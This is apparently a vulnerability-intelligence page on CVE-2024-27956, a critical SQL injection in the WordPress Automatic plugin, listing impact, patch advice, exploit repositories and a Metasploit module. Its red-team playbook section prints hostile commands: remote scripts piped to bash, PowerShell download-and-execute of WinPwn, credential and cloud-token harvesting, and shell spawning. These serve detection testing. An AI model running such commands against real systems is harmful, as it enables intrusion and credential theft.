CVE-2024-27956
Overview
This vulnerability is a SQL Injection caused by improper neutralization of special elements within SQL commands. The root cause lies in insufficient escaping and lack of parameterized queries in the Automatic plugin for WordPress, specifically affecting the SQL query construction in the CSV processing component. The flaw exists in the handling of user-supplied input parameters within the plugin's database interaction logic.
Vulnerability Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.
Impact
An unauthenticated attacker can execute arbitrary SQL queries against the backend database, enabling extraction of sensitive information or unauthorized modification of data. No user interaction or valid credentials are necessary to exploit this vulnerability. The consequence includes potential data breaches, unauthorized data manipulation, and disruption of application integrity, which may lead to broader system compromise or loss of trust in the affected WordPress installation.
Solution
Upgrade the WordPress Automatic plugin to version 3.92.1 or later, where this vulnerability has been addressed. Detailed patch instructions and advisory information are available at Patchstack's database and article pages (https://patchstack.com/database/vulnerability/wp-automatic and https://patchstack.com/articles/critical-vulnerabilities-patched-in-wordpress-automatic-plugin). Applying the vendor-provided update is the recommended mitigation to eliminate the SQL injection flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in ValvePress Automatic arises from improper neutralization of special elements used in SQL commands, commonly known as SQL Injection. This flaw allows an attacker to manipulate SQL queries by injecting malicious code through user input fields. The affected versions of ValvePress Automatic, up to 3.92.0, fail to adequately sanitize inputs, enabling attackers to execute arbitrary SQL commands on the underlying database. This can lead to unauthorized access to sensitive data, modification or deletion of database records, and potentially complete control over the database server.
Attack vectors for this vulnerability are varied and can be exploited through multiple entry points within the application. For instance, an attacker may target forms, URL parameters, or API endpoints that interact with the database. By crafting a specially designed input that includes SQL commands, the attacker can alter the intended SQL query executed by the application. Exploitation scenarios could range from simple data retrieval, such as extracting usernames and passwords, to more complex actions like creating new administrative accounts or dropping entire tables. The ease of executing such attacks, especially in poorly secured environments, makes this vulnerability particularly concerning.
The real-world impact of this SQL Injection vulnerability can be severe, posing significant business risks. Organizations utilizing ValvePress Automatic may face data breaches that compromise customer information, leading to legal ramifications and loss of customer trust. The financial implications can be substantial, including costs associated with incident response, potential fines from regulatory bodies, and the long-term damage to brand reputation. Moreover, the high CVSS score of 9.8 indicates that this vulnerability is critical and should be prioritized for remediation, as it can be exploited with minimal effort and potentially lead to catastrophic outcomes.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including penetration testing and vulnerability scanning, can help identify potential weaknesses in the application. Additionally, employing web application firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. It is also crucial to ensure that all user inputs are properly validated and sanitized to prevent SQL Injection attacks. Developers should adopt secure coding practices, such as using prepared statements and parameterized queries, to minimize the risk of injection vulnerabilities.
In conclusion, the SQL Injection vulnerability in ValvePress Automatic presents a significant threat to organizations that rely on this software. The potential for data compromise and the associated business risks necessitate immediate attention and action. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the exploitation of this critical vulnerability.
CSURFACE threat intelligence has detected a notable surge in activity related to CVE-2024-27956, with telemetry indicating increased exploitation attempts targeting ValvePress Automatic. This uptick coincides with the emergence of multiple new proof-of-concept exploits on public repositories, which automate complex attack chains including unauthorized admin account creation and remote code execution via SQL injection. While the EPSS score remains high and stable, the broader availability and automation of these exploits significantly lower the barrier for threat actors, potentially accelerating opportunistic attacks. For defenders, this development underscores an elevated risk environment where exploitation attempts may become more frequent and widespread, demanding heightened vigilance in monitoring and response. Consequently, the threat level associated with this vulnerability has intensified, reflecting a shift from theoretical risk to more active exploitation in the wild.
Update 2 — May 20, 2026
CSURFACE threat intelligence has identified a subtle but important shift in the CVE-2024-27956 exploitation landscape. While our telemetry indicates a significant reduction in direct detection activity, this decline does not reflect diminished threat but rather a maturation of exploitation tactics. New proof-of-concept tools with enhanced automation and ease of use have emerged on public repositories, broadening the pool of potential attackers capable of leveraging this critical SQL injection vulnerability. This expansion in exploit availability effectively lowers the technical barrier, increasing the likelihood of opportunistic and widespread attacks despite fewer overt detection events. The slight increase in the CVSS score to 9.9 underscores the growing severity and potential impact of successful exploitation. Although the EPSS score remains stable, the evolving exploit ecosystem signals a heightened risk environment. Defenders should interpret the reduction in telemetry as a potential indicator of more covert or sophisticated exploitation attempts rather than a decrease in threat activity. Consequently, the overall threat level associated with CVE-2024-27956 has intensified, reflecting a transition toward more active and accessible exploitation capabilities in the wild.
Update 3 — June 11, 2026
The recent adjustment of the CVSS score from 9.9 to 9.8 for CVE-2024-27956 reflects a refined understanding of the vulnerability’s impact rather than a reduction in its criticality. Concurrently, the EPSS score shows a marginal decline, indicating a slight stabilization in the probability of exploitation attempts as observed by our telemetry. Despite this subtle shift, the exploit landscape remains active with multiple new proof-of-concept tools emerging on public repositories, demonstrating sustained attacker interest and accessibility to exploitation methods. This persistence underscores that the vulnerability continues to present a high-risk vector for SQL injection attacks against ValvePress Automatic deployments. Defenders should note that the minor score adjustments do not diminish the urgency of the threat; instead, they highlight a nuanced calibration based on evolving data. The threat level remains critically high, supported by stable exploitation likelihood and an expanding arsenal of publicly available exploit code, which collectively maintain pressure on defensive postures.
Update 4 — June 20, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-27956, with telemetry indicating a doubling in detection frequency over the recent period. This increase, although moderate, is accompanied by a slight upward adjustment in the Exploit Prediction Scoring System (EPSS), reflecting a growing probability of exploitation attempts in the wild. Concurrently, the exploit landscape continues to expand with new proof-of-concept tools emerging on public repositories, enhancing attacker capabilities and lowering the barrier for exploitation. This convergence of heightened detection signals and an enriched exploit toolkit underscores an elevated operational tempo among threat actors targeting ValvePress Automatic environments. For defenders, this development signals an intensifying threat environment where the likelihood of successful SQL injection attacks is incrementally rising. While the overall threat level remains critically high, these trends suggest that adversaries are increasingly prioritizing this vulnerability, warranting sustained vigilance and adaptive defensive measures.
Update 5 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-27956, accompanied by the emergence of several new proof-of-concept exploits that automate complex attack chains, including remote code execution via SQL injection. Our telemetry indicates that adversaries are increasingly leveraging these enhanced tools to lower operational barriers, resulting in a sustained rise in detection activity. Although the EPSS score remains stable, the qualitative shift toward more sophisticated and automated exploit frameworks signifies a growing prioritization of this vulnerability by threat actors. This evolution heightens the risk landscape for organizations running ValvePress Automatic, as the convergence of increased exploitation attempts and richer exploit capabilities amplifies the likelihood of successful compromise. Consequently, the threat level associated with CVE-2024-27956 should be considered elevated beyond prior assessments, reflecting an intensifying adversary focus and operational tempo.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Valvepress | Automatic | All |
cpe:2.3:a:valvepress:automatic:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress wp-automatic Plugin SQLi Admin Creation
exploits/multi/http/wp_automatic_sqli_to_rce
|
Rafie Muhammad, Valentin Lobstein | Unknown | - | View |
GitHub PoCs (18)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956
WordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administr...
|
AiGptCode | 121 | 30 | 2024-05-14 | View |
|
diego-tella/CVE-2024-27956-RCE
PoC for SQL Injection in CVE-2024-27956
|
diego-tella | 89 | 25 | 2024-05-01 | View |
|
Ap0dexMe0/CVE-2024-27956
Perform with massive Wordpress SQLI 2 RCE
|
Ap0dexMe0 | 8 | 3 | 2024-07-11 | View |
|
ThatNotEasy/CVE-2024-27956
Perform with massive Wordpress SQLI 2 RCE
|
ThatNotEasy | 8 | 3 | 2024-07-11 | View |
|
itzheartzz/MASS-CVE-2024-27956
|
itzheartzz | 3 | 0 | 2024-06-09 | View |
|
Cappricio-Securities/CVE-2024-27956
WordPress Automatic Plugin <= 3.92.0 - SQL Injection
|
Cappricio-Securities | 2 | 1 | 2024-06-07 | View |
|
truonghuuphuc/CVE-2024-27956
CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection
|
truonghuuphuc | 2 | 0 | 2024-04-27 | View |
|
FoxyProxys/CVE-2024-27956
|
FoxyProxys | 1 | 0 | 2024-05-05 | View |
|
devsec23/CVE-2024-27956
CVE-2024-27956 - WP Automatic SQL Injection Exploit Tool
|
devsec23 | 1 | 0 | 2025-05-01 | View |
|
W3BW/CVE-2024-27956-RCE-File-Package
|
W3BW | 0 | 0 | 2024-05-15 | View |
|
hitazuranahiro/Valve-Press-CVE-2024-27956-RCE
Valve Press - CVE-2024-27956-RCE - SQL Injection
|
hitazuranahiro | 0 | 0 | 2024-06-13 | View |
|
cve-2024/CVE-2024-27956-RCE
|
cve-2024 | 0 | 0 | 2024-06-14 | View |
|
CERTologists/EXPLOITING-CVE-2024-27956
|
CERTologists | 0 | 0 | 2024-07-23 | View |
|
m4nInTh3mIdDle/wordpress-CVE-2024-27956
Attacks a vulnerable WordPress site with the wp-automatic plugin. Inserts a new user called eviladmin directly into t...
|
m4nInTh3mIdDle | 0 | 0 | 2025-04-27 | View |
|
0axz-tools/CVE-2024-27956
CVE-2024-27956
|
0axz-tools | 0 | 0 | 2025-10-17 | View |
|
7aRanchi/CVE-2024-27956-for-fscan
Yaml PoC rule for fscan.
|
7aRanchi | 0 | 0 | 2024-12-20 | View |
|
X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN
CVE-2024-27956 WORDPRESS RCE PLUGIN
|
X-Projetion | 0 | 0 | 2024-05-03 | View |
|
k3ppf0r/CVE-2024-27956
CVE-2024-27956
|
k3ppf0r | 0 | 0 | 2024-05-07 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-27956 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve |
| patchstack.com |
GitHub CVE
technical-description
third-party-advisory
|
https://patchstack.com/articles/critical-vulnerabilities-patched-in-wordpress-automatic-plugin?_s_id=cve |